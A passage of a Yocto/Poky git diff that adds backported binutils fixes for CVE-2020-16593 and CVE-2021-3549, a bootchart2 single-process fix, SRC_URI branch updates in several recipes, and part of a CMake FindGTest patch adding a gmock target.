811134a503..f8c17c19ae 100755 --enable-gold[=ARG] build gold [ARG={default,yes,no}] --enable-got= GOT handling scheme (target, single, negative, multigot) -@@ -15788,6 +15791,19 @@ fi +@@ -16624,6 +16627,19 @@ fi @@ -222,10 +222,10 @@ index 5287f19a7f..55096e4fc9 100644 /* The initial parser states. */ diff --git a/ld/ldmain.c b/ld/ldmain.c -index da1ad17763..12d0b07d8a 100644 +index c4af10f4e9..95b56b2d2d 100644 --- a/ld/ldmain.c +++ b/ld/ldmain.c -@@ -274,6 +274,8 @@ main (int argc, char **argv) +@@ -273,6 +273,8 @@ main (int argc, char **argv) command_line.warn_mismatch = TRUE; command_line.warn_search_mismatch = TRUE; command_line.check_section_addresses = -1; @@ -235,7 +235,7 @@ index da1ad17763..12d0b07d8a 100644 /* We initialize DEMANGLING based on the environment variable COLLECT_NO_DEMANGLE. The gcc collect2 program will demangle the diff --git a/ld/lexsup.c b/ld/lexsup.c -index 3d15cc491d..0e8b4f2b7a 100644 +index 3d15cc491d..6478821443 100644 --- a/ld/lexsup.c +++ b/ld/lexsup.c @@ -550,6 +550,14 @@ static const struct ld_option ld_options[] = @@ -253,10 +253,10 @@ index 3d15cc491d..0e8b4f2b7a 100644 }; #define OPTION_COUNT ARRAY_SIZE (ld_options) -@@ -1603,6 +1611,13 @@ parse_args (unsigned argc, char **argv) - +@@ -1604,6 +1612,14 @@ parse_args (unsigned argc, char **argv) case OPTION_PRINT_MAP_DISCARDED: config.print_map_discarded = TRUE; + break; + + case OPTION_NO_POISON_SYSTEM_DIRECTORIES: + command_line.poison_system_directories = FALSE; @@ -264,6 +264,6 @@ index 3d15cc491d..0e8b4f2b7a 100644 + + case OPTION_ERROR_POISON_SYSTEM_DIRECTORIES: + command_line.error_poison_system_directories = TRUE; - break; ++ break; } } diff --git a/poky/meta/recipes-devtools/binutils/binutils/CVE-2020-16593.patch b/poky/meta/recipes-devtools/binutils/binutils/CVE-2020-16593.patch new file mode 100644 index 0000000000..cbe4a50507 --- /dev/null +++ b/poky/meta/recipes-devtools/binutils/binutils/CVE-2020-16593.patch @@ -0,0 +1,204 @@ +From aec72fda3b320c36eb99fc1c4cf95b10fc026729 Mon Sep 17 00:00:00 2001 +From: Alan Modra +Date: Thu, 16 Apr 2020 17:49:38 +0930 +Subject: [PATCH] PR25827, Null pointer dereferencing in scan_unit_for_symbols + + PR 25827 + * dwarf2.c (scan_unit_for_symbols): Wrap overlong lines. Don't + strdup(0). + +Upstream-Status: Backport +https://sourceware.org/git/gitweb.cgi?p=binutils-gdb.git;h=aec72fda3b320c36eb99fc1c4cf95b10fc026729 +CVE: CVE-2020-16593 +Signed-off-by: Armin Kuster + + +Index: git/bfd/dwarf2.c +=================================================================== +--- git.orig/bfd/dwarf2.c ++++ git/bfd/dwarf2.c +@@ -295,12 +295,12 @@ struct comp_unit + /* This data structure holds the information of an abbrev. */ + struct abbrev_info + { +- unsigned int number; /* Number identifying abbrev. */ +- enum dwarf_tag tag; /* DWARF tag. */ +- int has_children; /* Boolean. */ +- unsigned int num_attrs; /* Number of attributes. */ +- struct attr_abbrev *attrs; /* An array of attribute descriptions. */ +- struct abbrev_info *next; /* Next in chain. */ ++ unsigned int number; /* Number identifying abbrev. */ ++ enum dwarf_tag tag; /* DWARF tag. */ ++ bfd_boolean has_children; /* TRUE if the abbrev has children. */ ++ unsigned int num_attrs; /* Number of attributes. */ ++ struct attr_abbrev * attrs; /* An array of attribute descriptions. */ ++ struct abbrev_info * next; /* Next in chain. */ + }; + + struct attr_abbrev +@@ -1487,6 +1487,8 @@ struct varinfo + { + /* Pointer to previous variable in list of all variables */ + struct varinfo *prev_var; ++ /* The offset of the varinfo from the start of the unit. */ ++ bfd_uint64_t unit_offset; + /* Source location file name */ + char *file; + /* Source location line number */ +@@ -1497,7 +1499,7 @@ struct varinfo + /* Where the symbol is defined */ + asection *sec; + /* Is this a stack variable? */ +- unsigned int stack: 1; ++ bfd_boolean stack; + }; + + /* Return TRUE if NEW_LINE should sort after LINE. */ +@@ -2871,7 +2873,7 @@ lookup_symbol_in_variable_table (struct + struct varinfo* each; + + for (each = unit->variable_table; each; each = each->prev_var) +- if (each->stack == 0 ++ if (! each->stack + && each->file != NULL + && each->name != NULL + && each->addr == addr +@@ -3166,6 +3168,20 @@ read_rangelist (struct comp_unit *unit, + return TRUE; + } + ++static struct varinfo * ++lookup_var_by_offset (bfd_uint64_t offset, struct varinfo * table) ++{ ++ while (table) ++ { ++ if (table->unit_offset == offset) ++ return table; ++ table = table->prev_var; ++ } ++ ++ return NULL; ++} ++ ++ + /* DWARF2 Compilation unit functions. */ + + /* Scan over each die in a comp. unit looking for functions to add +@@ -3202,6 +3218,9 @@ scan_unit_for_symbols (struct comp_unit + bfd_vma low_pc = 0; + bfd_vma high_pc = 0; + bfd_boolean high_pc_relative = FALSE; ++ bfd_uint64_t current_offset; ++ ++ current_offset = info_ptr - unit->info_ptr_unit; + + /* PR 17512: file: 9f405d9d. */ + if (info_ptr >= info_ptr_end) +@@ -3234,12 +3253,13 @@ scan_unit_for_symbols (struct comp_unit + goto fail; + } + +- var = NULL; + if (abbrev->tag == DW_TAG_subprogram + || abbrev->tag == DW_TAG_entry_point + || abbrev->tag == DW_TAG_inlined_subroutine) + { + bfd_size_type amt = sizeof (struct funcinfo); ++ ++ var = NULL; + func = (struct funcinfo *) bfd_zalloc (abfd, amt); + if (func == NULL) + goto fail; +@@ -3268,13 +3288,15 @@ scan_unit_for_symbols (struct comp_unit + if (var == NULL) + goto fail; + var->tag = abbrev->tag; +- var->stack = 1; ++ var->stack = TRUE; + var->prev_var = unit->variable_table; + unit->variable_table = var; ++ var->unit_offset = current_offset; + /* PR 18205: Missing debug information can cause this + var to be attached to an already cached unit. */ + } +- ++ else ++ var = NULL; + /* No inline function in scope at this nesting level. */ + nested_funcs[nesting_level].func = 0; + } +@@ -3362,6 +3384,33 @@ scan_unit_for_symbols (struct comp_unit + { + switch (attr.name) + { ++ case DW_AT_specification: ++ if (attr.u.val) ++ { ++ struct varinfo * spec_var; ++ ++ spec_var = lookup_var_by_offset (attr.u.val, ++ unit->variable_table); ++ if (spec_var == NULL) ++ { ++ _bfd_error_handler (_("DWARF error: could not find " ++ "variable specification " ++ "at offset %lx"), ++ (unsigned long) attr.u.val); ++ break; ++ } ++ ++ if (var->name == NULL) ++ var->name = spec_var->name; ++ if (var->file == NULL && spec_var->file != NULL) ++ var->file = strdup (spec_var->file); ++ if (var->line == 0) ++ var->line = spec_var->line; ++ if (var->sec == NULL) ++ var->sec = spec_var->sec; ++ } ++ break; ++ + case DW_AT_name: + if (is_str_attr (attr.form)) + var->name = attr.u.str; +@@ -3378,7 +3427,7 @@ scan_unit_for_symbols (struct comp_unit + + case DW_AT_external: + if (attr.u.val != 0) +- var->stack = 0; ++ var->stack = FALSE; + break; + + case DW_AT_location: +@@ -3392,7 +3441,7 @@ scan_unit_for_symbols (struct comp_unit + if (attr.u.blk->data != NULL + && *attr.u.blk->data == DW_OP_addr) + { +- var->stack = 0; ++ var->stack = FALSE; + + /* Verify that DW_OP_addr is the only opcode in the + location, in which case the block size will be 1 +@@ -3888,7 +3937,7 @@ comp_unit_hash_info (struct dwarf2_debug + each_var = each_var->prev_var) + { + /* Skip stack vars and vars with no files or names. */ +- if (each_var->stack == 0 ++ if (! each_var->stack + && each_var->file != NULL + && each_var->name != NULL) + /* There is no need to copy name string into hash table as +Index: git/bfd/ChangeLog +=================================================================== +--- git.orig/bfd/ChangeLog ++++ git/bfd/ChangeLog +@@ -1,3 +1,9 @@ ++2020-04-16 Alan Modra ++ ++ PR 25827 ++ * dwarf2.c (scan_unit_for_symbols): Wrap overlong lines. Don't ++ strdup(0). ++ + 2020-02-19 H.J. Lu + + PR binutils/25355 diff --git a/poky/meta/recipes-devtools/binutils/binutils/CVE-2021-3549.patch b/poky/meta/recipes-devtools/binutils/binutils/CVE-2021-3549.patch new file mode 100644 index 0000000000..4391db340a --- /dev/null +++ b/poky/meta/recipes-devtools/binutils/binutils/CVE-2021-3549.patch @@ -0,0 +1,187 @@ +From 1cfcf3004e1830f8fe9112cfcd15285508d2c2b7 Mon Sep 17 00:00:00 2001 +From: Alan Modra +Date: Thu, 11 Feb 2021 16:56:42 +1030 +Subject: [PATCH] PR27290, PR27293, PR27295, various avr objdump fixes + +Adds missing sanity checks for avr device info note, to avoid +potential buffer overflows. Uses bfd_malloc_and_get_section for +sanity checking section size. + + PR 27290 + PR 27293 + PR 27295 + * od-elf32_avr.c (elf32_avr_get_note_section_contents): Formatting. + Use bfd_malloc_and_get_section. + (elf32_avr_get_note_desc): Formatting. Return descsz. Sanity + check namesz. Return NULL if descsz is too small. Ensure + string table is terminated. + (elf32_avr_get_device_info): Formatting. Add note_size param. + Sanity check note. + (elf32_avr_dump_mem_usage): Adjust to suit. + +Upstream-Status: Backport +CVE: CVE-2021-3549 +Signed-of-by: Armin Kuster + +--- + binutils/ChangeLog | 14 +++++++++ + binutils/od-elf32_avr.c | 66 ++++++++++++++++++++++++++--------------- + 2 files changed, 56 insertions(+), 24 deletions(-) + +Index: git/binutils/od-elf32_avr.c +=================================================================== +--- git.orig/binutils/od-elf32_avr.c ++++ git/binutils/od-elf32_avr.c +@@ -77,23 +77,29 @@ elf32_avr_filter (bfd *abfd) + return bfd_get_flavour (abfd) == bfd_target_elf_flavour; + } + +-static char* ++static char * + elf32_avr_get_note_section_contents (bfd *abfd, bfd_size_type *size) + { + asection *section; ++ bfd_byte *contents; + +- if ((section = bfd_get_section_by_name (abfd, ".note.gnu.avr.deviceinfo")) == NULL) ++ section = bfd_get_section_by_name (abfd, ".note.gnu.avr.deviceinfo"); ++ if (section == NULL) + return NULL; + +- *size = bfd_section_size (section); +- char *contents = (char *) xmalloc (*size); +- bfd_get_section_contents (abfd, section, contents, 0, *size); ++ if (!bfd_malloc_and_get_section (abfd, section, &contents)) ++ { ++ free (contents); ++ contents = NULL; ++ } + +- return contents; ++ *size = bfd_section_size (section); ++ return (char *) contents; + } + +-static char* elf32_avr_get_note_desc (bfd *abfd, char *contents, +- bfd_size_type size) ++static char * ++elf32_avr_get_note_desc (bfd *abfd, char *contents, bfd_size_type size, ++ bfd_size_type *descsz) + { + Elf_External_Note *xnp = (Elf_External_Note *) contents; + Elf_Internal_Note in; +@@ -107,42 +113,54 @@ static char* elf32_avr_get_note_desc (bf + if (in.namesz > contents - in.namedata + size) + return NULL; + ++ if (in.namesz != 4 || strcmp (in.namedata, "AVR") != 0) ++ return NULL; ++ + in.descsz = bfd_get_32 (abfd, xnp->descsz); + in.descdata = in.namedata + align_power (in.namesz, 2); +- if (in.descsz != 0 +- && (in.descdata >= contents + size +- || in.descsz > contents - in.descdata + size)) ++ if (in.descsz < 6 * sizeof (uint32_t) ++ || in.descdata >= contents + size ++ || in.descsz > contents - in.descdata + size) + return NULL; + +- if (strcmp (in.namedata, "AVR") != 0) +- return NULL; ++ /* If the note has a string table, ensure it is 0 terminated. */ ++ if (in.descsz > 8 * sizeof (uint32_t)) ++ in.descdata[in.descsz - 1] = 0; + ++ *descsz = in.descsz; + return in.descdata; + } + + static void + elf32_avr_get_device_info (bfd *abfd, char *description, +- deviceinfo *device) ++ bfd_size_type desc_size, deviceinfo *device) + { + if (description == NULL) + return; + + const bfd_size_type memory_sizes = 6; + +- memcpy (device, description, memory_sizes * sizeof(uint32_t)); +- device->name = NULL; ++ memcpy (device, description, memory_sizes * sizeof (uint32_t)); ++ desc_size -= memory_sizes * sizeof (uint32_t); ++ if (desc_size < 8) ++ return; + +- uint32_t *stroffset_table = ((uint32_t *) description) + memory_sizes; ++ uint32_t *stroffset_table = (uint32_t *) description + memory_sizes; + bfd_size_type stroffset_table_size = bfd_get_32 (abfd, stroffset_table); +- char *str_table = ((char *) stroffset_table) + stroffset_table_size; + + /* If the only content is the size itself, there's nothing in the table */ +- if (stroffset_table_size == 4) ++ if (stroffset_table_size < 8) + return; ++ if (desc_size <= stroffset_table_size) ++ return; ++ desc_size -= stroffset_table_size; + + /* First entry is the device name index. */ + uint32_t device_name_index = bfd_get_32 (abfd, stroffset_table + 1); ++ if (device_name_index >= desc_size) ++ return; + ++ char *str_table = (char *) stroffset_table + stroffset_table_size; + device->name = str_table + device_name_index; + } + +@@ -183,7 +201,7 @@ static void + elf32_avr_dump_mem_usage (bfd *abfd) + { + char *description = NULL; +- bfd_size_type note_section_size = 0; ++ bfd_size_type sec_size, desc_size; + + deviceinfo device = { 0, 0, 0, 0, 0, 0, NULL }; + device.name = "Unknown"; +@@ -192,13 +210,13 @@ elf32_avr_dump_mem_usage (bfd *abfd) + bfd_size_type text_usage = 0; + bfd_size_type eeprom_usage = 0; + +- char *contents = elf32_avr_get_note_section_contents (abfd, +- ¬e_section_size); ++ char *contents = elf32_avr_get_note_section_contents (abfd, &sec_size); + + if (contents != NULL) + { +- description = elf32_avr_get_note_desc (abfd, contents, note_section_size); +- elf32_avr_get_device_info (abfd, description, &device); ++ description = elf32_avr_get_note_desc (abfd, contents, sec_size, ++ &desc_size); ++ elf32_avr_get_device_info (abfd, description, desc_size, &device); + } + + elf32_avr_get_memory_usage (abfd, &text_usage, &data_usage, +Index: git/binutils/ChangeLog +=================================================================== +--- git.orig/binutils/ChangeLog ++++ git/binutils/ChangeLog +@@ -1,3 +1,17 @@ ++2021-02-11 Alan Modra ++ ++ PR 27290 ++ PR 27293 ++ PR 27295 ++ * od-elf32_avr.c (elf32_avr_get_note_section_contents): Formatting. ++ Use bfd_malloc_and_get_section. ++ (elf32_avr_get_note_desc): Formatting. Return descsz. Sanity ++ check namesz. Return NULL if descsz is too small. Ensure ++ string table is terminated. ++ (elf32_avr_get_device_info): Formatting. Add note_size param. ++ Sanity check note. ++ (elf32_avr_dump_mem_usage): Adjust to suit. ++ + 2020-02-01 Nick Clifton + + * configure: Regenerate. diff --git a/poky/meta/recipes-devtools/bootchart2/bootchart2/0001-bootchartd.in-make-sure-only-one-bootchartd-process.patch b/poky/meta/recipes-devtools/bootchart2/bootchart2/0001-bootchartd.in-make-sure-only-one-bootchartd-process.patch new file mode 100644 index 0000000000..3cb8a3c2a2 --- /dev/null +++ b/poky/meta/recipes-devtools/bootchart2/bootchart2/0001-bootchartd.in-make-sure-only-one-bootchartd-process.patch @@ -0,0 +1,68 @@ +From 988ca784d4840c87509e770a21d5d22105af8668 Mon Sep 17 00:00:00 2001 +From: Mingli Yu +Date: Fri, 5 Nov 2021 11:18:07 +0800 +Subject: [PATCH] bootchartd.in: make sure only one bootchartd process + +When boot with "init=/sbin/bootchartd" as below: + # runqemu qemux86 bootparams="init=/sbin/bootchartd" + +There are two bootchartd process after boot [1]. + # ps -ef | grep bootchart +root 101 1 0 03:27 ? 00:00:00 /bin/sh /sbin/bootchartd +root 103 101 8 03:27 ? 00:00:02 /lib64/bootchart/bootchart-collector 50 +root 106 1 0 03:27 ? 00:00:00 /bin/sh /sbin/bootchartd +root 792 106 0 03:27 ? 00:00:00 /lib64/bootchart/bootchart-collector --usleep 1000000 +root 794 725 0 03:27 ttyS0 00:00:00 grep bootchart + + # /sbin/bootchartd stop +[bootchart] bootchart-collector started as pid 596 with 2 args: +[bootchart] '--dump' +[bootchart] '/tmp/bootchart.3lXpVDAq3v' +[bootchart] Extracting profile data from pid 204 +[bootchart] map 0xbed9a000 -> 0xbedbb000 size: 132k from 'bed9a000' 'bedbb000' +[bootchart] read 135168 bytes of 135168 +[bootchart] reading 150 chunks (of 150) ... +[bootchart] wrote 18760 kbB +[bootchart] bootchart-collector pid: 596 unmounted proc / clean exit + +But there still one process exist after the above stop command finish. + # ps -ef | grep bootchartd +root 202 1 0 09:09 ? 00:00:00 /bin/sh /sbin/bootchartd +root 629 516 0 09:10 ? 00:00:00 grep bootchartd + +Remove the wait_boot which used to wait the boot process to finish to +make sure only one bootchartd process and meanwhile we don't need the +wait_boot logic because we either use "/sbin/bootchartd stop" to stop +the bootchartd manually or install package bootchartd-stop-initscript +altogether with bootchart2 to stop bootchartd automatically after boot. + +After patch: + # ps -ef | grep bootchart + root 101 1 0 03:36 ? 00:00:00 /bin/sh /sbin/bootchartd + root 103 101 6 03:36 ? 00:00:04 /lib64/bootchart/bootchart-collector 50 + root 596 592 0 03:37 ttyS0 00:00:00 grep bootchart + +[1] https://github.com/xrmx/bootchart/issues/94 + +Upstream-Status: Submitted [https://github.com/xrmx/bootchart/pull/95] + +Signed-off-by: Mingli Yu +--- + bootchartd.in | 1 - + 1 file changed, 1 deletion(-) + +diff --git a/bootchartd.in b/bootchartd.in +index 7979ef9..f0e466d 100755 +--- a/bootchartd.in ++++ b/bootchartd.in +@@ -183,7 +183,6 @@ if [ $$ -eq 1 ]; then + else # running inside the main system + echo "bootchart: no initrd used; starting" + start & +- wait_boot & + # wait a little, until the collector is going, before allowing + # the rest of the system to charge ahead, so we catch it + $USLEEP 250000 +-- +2.17.1 + diff --git a/poky/meta/recipes-devtools/bootchart2/bootchart2_0.14.9.bb b/poky/meta/recipes-devtools/bootchart2/bootchart2_0.14.9.bb index 6571c19938..66bd897a9a 100644 --- a/poky/meta/recipes-devtools/bootchart2/bootchart2_0.14.9.bb +++ b/poky/meta/recipes-devtools/bootchart2/bootchart2_0.14.9.bb @@ -90,10 +90,11 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=44ac4678311254db62edf8fd39cb8124" UPSTREAM_CHECK_GITTAGREGEX = "(?P\d+\.\d+(\.\d+)*)" -SRC_URI = "git://github.com/xrmx/bootchart.git \ +SRC_URI = "git://github.com/xrmx/bootchart.git;branch=master;protocol=https \ file://bootchartd_stop.sh \ file://0001-collector-Allocate-space-on-heap-for-chunks.patch \ file://0001-bootchart2-support-usrmerge.patch \ + file://0001-bootchartd.in-make-sure-only-one-bootchartd-process.patch \ " S = "${WORKDIR}/git" diff --git a/poky/meta/recipes-devtools/btrfs-tools/btrfs-tools_5.4.1.bb b/poky/meta/recipes-devtools/btrfs-tools/btrfs-tools_5.4.1.bb index 4112cf484f..be61916cc6 100644 --- a/poky/meta/recipes-devtools/btrfs-tools/btrfs-tools_5.4.1.bb +++ b/poky/meta/recipes-devtools/btrfs-tools/btrfs-tools_5.4.1.bb @@ -15,7 +15,7 @@ DEPENDS_append_class-target = " udev" RDEPENDS_${PN} = "libgcc" SRCREV = "3fc2326d3474a5e4df2449f5e3043f7298501334" -SRC_URI = "git://git.kernel.org/pub/scm/linux/kernel/git/kdave/btrfs-progs.git \ +SRC_URI = "git://git.kernel.org/pub/scm/linux/kernel/git/kdave/btrfs-progs.git;branch=master \ file://0001-Add-a-possibility-to-specify-where-python-modules-ar.patch \ " diff --git a/poky/meta/recipes-devtools/build-compare/build-compare_git.bb b/poky/meta/recipes-devtools/build-compare/build-compare_git.bb index b0560cc277..6afa9a0d68 100644 --- a/poky/meta/recipes-devtools/build-compare/build-compare_git.bb +++ b/poky/meta/recipes-devtools/build-compare/build-compare_git.bb @@ -5,7 +5,7 @@ HOMEPAGE = "https://github.com/openSUSE/build-compare" LICENSE = "GPLv2" LIC_FILES_CHKSUM = "file://COPYING;md5=751419260aa954499f7abaabaa882bbe" -SRC_URI = "git://github.com/openSUSE/build-compare.git \ +SRC_URI = "git://github.com/openSUSE/build-compare.git;branch=master;protocol=https \ file://Ignore-DWARF-sections.patch;striplevel=1 \ " diff --git a/poky/meta/recipes-devtools/cmake/cmake-native_3.16.5.bb b/poky/meta/recipes-devtools/cmake/cmake-native_3.16.5.bb index b2952ee5f5..96a7be6770 100644 --- a/poky/meta/recipes-devtools/cmake/cmake-native_3.16.5.bb +++ b/poky/meta/recipes-devtools/cmake/cmake-native_3.16.5.bb @@ -7,6 +7,7 @@ SRC_URI += "file://OEToolchainConfig.cmake \ file://environment.d-cmake.sh \ file://0001-CMakeDetermineSystem-use-oe-environment-vars-to-load.patch \ file://0005-Disable-use-of-ext2fs-ext2_fs.h-by-cmake-s-internal-.patch \ + file://0006-cmake-FindGTest-Add-target-for-gmock-library.patch \ " diff --git a/poky/meta/recipes-devtools/cmake/cmake/0006-cmake-FindGTest-Add-target-for-gmock-library.patch b/poky/meta/recipes-devtools/cmake/cmake/0006-cmake-FindGTest-Add-target-for-gmock-library.patch new file mode 100644 index 0000000000..267f586a71 --- /dev/null +++ b/poky/meta/recipes-devtools/cmake/cmake/0006-cmake-FindGTest-Add-target-for-gmock-library.patch @@ -0,0 +1,255 @@ +From 39eae0d6c1b398f18761abac7f55944f0290f8a1 Mon Sep 17 00:00:00 2001 +From: Eero Aaltonen +Date: Sun, 17 Oct 2021 17:13:07 +0300 +Subject: [PATCH] FindGTest: Add target for gmock library + +`googlemock` has been absorbed into the +[googletest](https://github.com/google/googletest) project and is built +and installed from the same source tree. + +As GTest may be built with or without GMock, skip GMock if it is not +present. + +Do not provide result variables for GMock. They are not provided by +upstream GTest's CMake Package Configuration File. + +Also update the test case to cover linking to `GTest::gmock`. + +The patch was imported from the Kitware git server +(git@gitlab.kitware.com:cmake/cmake.git) as of commit id +50bf457a0dd857cf976b22c5be7d333493233d1e + +Patch was modified to support upper case variable `GTEST_FOUND`. + +Upstream-Status: Accepted [https://gitlab.kitware.com/cmake/cmake/-/merge_requests/6632] +Milestone: 3.23.0 + +Signed-off-by: Eero Aaltonen +--- + .../dev/FindGTest-target-for-gmock.rst | 4 + + Modules/FindGTest.cmake | 133 +++++++++++++++--- + Tests/FindGTest/Test/CMakeLists.txt | 4 + + 3 files changed, 121 insertions(+), 20 deletions(-) + create mode 100644 Help/release/dev/FindGTest-target-for-gmock.rst + +diff --git a/Help/release/dev/FindGTest-target-for-gmock.rst b/Help/release/dev/FindGTest-target-for-gmock.rst +new file mode 100644 +index 0000000000..f78242c80e +--- /dev/null ++++ b/Help/release/dev/FindGTest-target-for-gmock.rst +@@ -0,0 +1,4 @@ ++FindGTest-target-for-gmock ++-------------------------- ++ ++* The :module:`FindGTest` module now provides a target for GMock, if found. +diff --git a/Modules/FindGTest.cmake b/Modules/FindGTest.cmake +index e015a9840f..0331049594 100644 +--- a/Modules/FindGTest.cmake ++++ b/Modules/FindGTest.cmake +@@ -7,10 +7,23 @@ FindGTest + + Locate the Google C++ Testing Framework. + ++.. versionadded:: 3.20 ++ Upstream ``GTestConfig.cmake`` is used if possible. ++ + Imported targets + ^^^^^^^^^^^^^^^^ + +-This module defines the following :prop_tgt:`IMPORTED` targets: ++ This module defines the following :prop_tgt:`IMPORTED` targets: ++ ++``GTest::gtest`` ++ The Google Test ``gtest`` library, if found; adds Thread::Thread ++ automatically ++``GTest::gtest_main`` ++ The Google Test ``gtest_main`` library, if found ++ ++.. deprecated:: 3.20 ++ For backwards compatibility, this module defines additionally the ++ following deprecated :prop_tgt:`IMPORTED` targets (available since 3.5): + + ``GTest::GTest`` + The Google Test ``gtest`` library, if found; adds Thread::Thread +@@ -18,7 +31,6 @@ This module defines the following :prop_tgt:`IMPORTED` targets: + ``GTest::Main`` + The Google Test ``gtest_main`` library, if found + +- + Result variables + ^^^^^^^^^^^^^^^^ + +@@ -146,8 +158,42 @@ function(__gtest_import_library _target _var _config) + endif() + endfunction() + ++function(__gtest_define_backwards_compatible_library_targets) ++ set(GTEST_BOTH_LIBRARIES ${GTEST_LIBRARIES} ${GTEST_MAIN_LIBRARIES} PARENT_SCOPE) ++ ++ # Add targets mapping the same library names as defined in ++ # older versions of CMake's FindGTest ++ if(NOT TARGET GTest::GTest) ++ add_library(GTest::GTest INTERFACE IMPORTED) ++ target_link_libraries(GTest::GTest INTERFACE GTest::gtest) ++ endif() ++ if(NOT TARGET GTest::Main) ++ add_library(GTest::Main INTERFACE IMPORTED) ++ target_link_libraries(GTest::Main INTERFACE GTest::gtest_main) ++ endif() ++endfunction() ++ + # + ++include(${CMAKE_CURRENT_LIST_DIR}/FindPackageHandleStandardArgs.cmake) ++ ++# first specifically look for the CMake version of GTest ++find_package(GTest QUIET NO_MODULE) ++ ++# if we found the GTest cmake package then we are done, and ++# can print what we found and return. ++if(GTest_FOUND) ++ set(GTEST_FOUND ${GTest_FOUND}) ++ FIND_PACKAGE_HANDLE_STANDARD_ARGS(GTest HANDLE_COMPONENTS CONFIG_MODE) ++ ++ set(GTEST_LIBRARIES GTest::gtest) ++ set(GTEST_MAIN_LIBRARIES GTest::gtest_main) ++ ++ __gtest_define_backwards_compatible_library_targets() ++ ++ return() ++endif() ++ + if(NOT DEFINED GTEST_MSVC_SEARCH) + set(GTEST_MSVC_SEARCH MD) + endif() +@@ -194,50 +240,97 @@ if(MSVC AND GTEST_MSVC_SEARCH STREQUAL "MD") + __gtest_find_library(GTEST_LIBRARY_DEBUG gtest-mdd gtestd) + __gtest_find_library(GTEST_MAIN_LIBRARY gtest_main-md gtest_main) + __gtest_find_library(GTEST_MAIN_LIBRARY_DEBUG gtest_main-mdd gtest_maind) ++ __gtest_find_library(GMOCK_LIBRARY gmock-md gmock) ++ __gtest_find_library(GMOCK_LIBRARY_DEBUG gmock-mdd gmockd) ++ __gtest_find_library(GMOCK_MAIN_LIBRARY gmock_main-md gmock_main) ++ __gtest_find_library(GMOCK_MAIN_LIBRARY_DEBUG gmock_main-mdd gmock_maind) + else() + __gtest_find_library(GTEST_LIBRARY gtest) + __gtest_find_library(GTEST_LIBRARY_DEBUG gtestd) + __gtest_find_library(GTEST_MAIN_LIBRARY gtest_main) + __gtest_find_library(GTEST_MAIN_LIBRARY_DEBUG gtest_maind) ++ __gtest_find_library(GMOCK_LIBRARY gmock) ++ __gtest_find_library(GMOCK_LIBRARY_DEBUG gmockd) ++ __gtest_find_library(GMOCK_MAIN_LIBRARY gmock_main) ++ __gtest_find_library(GMOCK_MAIN_LIBRARY_DEBUG gmock_maind) + endif() + +-include(${CMAKE_CURRENT_LIST_DIR}/FindPackageHandleStandardArgs.cmake) + FIND_PACKAGE_HANDLE_STANDARD_ARGS(GTest DEFAULT_MSG GTEST_LIBRARY GTEST_INCLUDE_DIR GTEST_MAIN_LIBRARY) + +-if(GTEST_FOUND) ++if(GMOCK_LIBRARY AND GMOCK_MAIN_LIBRARY) ++ set(GMock_FOUND True) ++else() ++ set(GMock_FOUND False) ++endif() ++ ++if(GTest_FOUND) + set(GTEST_INCLUDE_DIRS ${GTEST_INCLUDE_DIR}) + __gtest_append_debugs(GTEST_LIBRARIES GTEST_LIBRARY) + __gtest_append_debugs(GTEST_MAIN_LIBRARIES GTEST_MAIN_LIBRARY) +- set(GTEST_BOTH_LIBRARIES ${GTEST_LIBRARIES} ${GTEST_MAIN_LIBRARIES}) + + find_package(Threads QUIET) + +- if(NOT TARGET GTest::GTest) ++ if(NOT TARGET GTest::gtest) + __gtest_determine_library_type(GTEST_LIBRARY) +- add_library(GTest::GTest ${GTEST_LIBRARY_TYPE} IMPORTED) ++ add_library(GTest::gtest ${GTEST_LIBRARY_TYPE} IMPORTED) + if(TARGET Threads::Threads) +- set_target_properties(GTest::GTest PROPERTIES ++ set_target_properties(GTest::gtest PROPERTIES + INTERFACE_LINK_LIBRARIES Threads::Threads) + endif() + if(GTEST_LIBRARY_TYPE STREQUAL "SHARED") +- set_target_properties(GTest::GTest PROPERTIES ++ set_target_properties(GTest::gtest PROPERTIES + INTERFACE_COMPILE_DEFINITIONS "GTEST_LINKED_AS_SHARED_LIBRARY=1") + endif() + if(GTEST_INCLUDE_DIRS) +- set_target_properties(GTest::GTest PROPERTIES ++ set_target_properties(GTest::gtest PROPERTIES + INTERFACE_INCLUDE_DIRECTORIES "${GTEST_INCLUDE_DIRS}") + endif() +- __gtest_import_library(GTest::GTest GTEST_LIBRARY "") +- __gtest_import_library(GTest::GTest GTEST_LIBRARY "RELEASE") +- __gtest_import_library(GTest::GTest GTEST_LIBRARY "DEBUG") ++ __gtest_import_library(GTest::gtest GTEST_LIBRARY "") ++ __gtest_import_library(GTest::gtest GTEST_LIBRARY "RELEASE") ++ __gtest_import_library(GTest::gtest GTEST_LIBRARY "DEBUG") + endif() +- if(NOT TARGET GTest::Main) ++ if(NOT TARGET GTest::gtest_main) + __gtest_determine_library_type(GTEST_MAIN_LIBRARY) +- add_library(GTest::Main ${GTEST_MAIN_LIBRARY_TYPE} IMPORTED) +- set_target_properties(GTest::Main PROPERTIES +- INTERFACE_LINK_LIBRARIES "GTest::GTest") +- __gtest_import_library(GTest::Main GTEST_MAIN_LIBRARY "") +- __gtest_import_library(GTest::Main GTEST_MAIN_LIBRARY "RELEASE") +- __gtest_import_library(GTest::Main GTEST_MAIN_LIBRARY "DEBUG") ++ add_library(GTest::gtest_main ${GTEST_MAIN_LIBRARY_TYPE} IMPORTED) ++ set_target_properties(GTest::gtest_main PROPERTIES ++ INTERFACE_LINK_LIBRARIES "GTest::gtest") ++ __gtest_import_library(GTest::gtest_main GTEST_MAIN_LIBRARY "") ++ __gtest_import_library(GTest::gtest_main GTEST_MAIN_LIBRARY "RELEASE") ++ __gtest_import_library(GTest::gtest_main GTEST_MAIN_LIBRARY "DEBUG") ++ endif() ++ ++ __gtest_define_backwards_compatible_library_targets() ++endif() ++ ++if(GMock_FOUND) ++ if(NOT TARGET GTest::gmock) ++ __gtest_determine_library_type(GMOCK_LIBRARY) ++ add_library(GTest::gmock ${GMOCK_LIBRARY_TYPE} IMPORTED) ++ set(_gmock_link_libraries "GTest::gtest") ++ if(TARGET Threads::Threads) ++ list(APPEND _gmock_link_libraries Threads::Threads) ++ endif() ++ set_target_properties(GTest::gmock PROPERTIES ++ INTERFACE_LINK_LIBRARIES "${_gmock_link_libraries}") ++ if(GMOCK_LIBRARY_TYPE STREQUAL "SHARED") ++ set_target_properties(GTest::gmock PROPERTIES ++ INTERFACE_COMPILE_DEFINITIONS "GMOCK_LINKED_AS_SHARED_LIBRARY=1") ++ endif() ++ 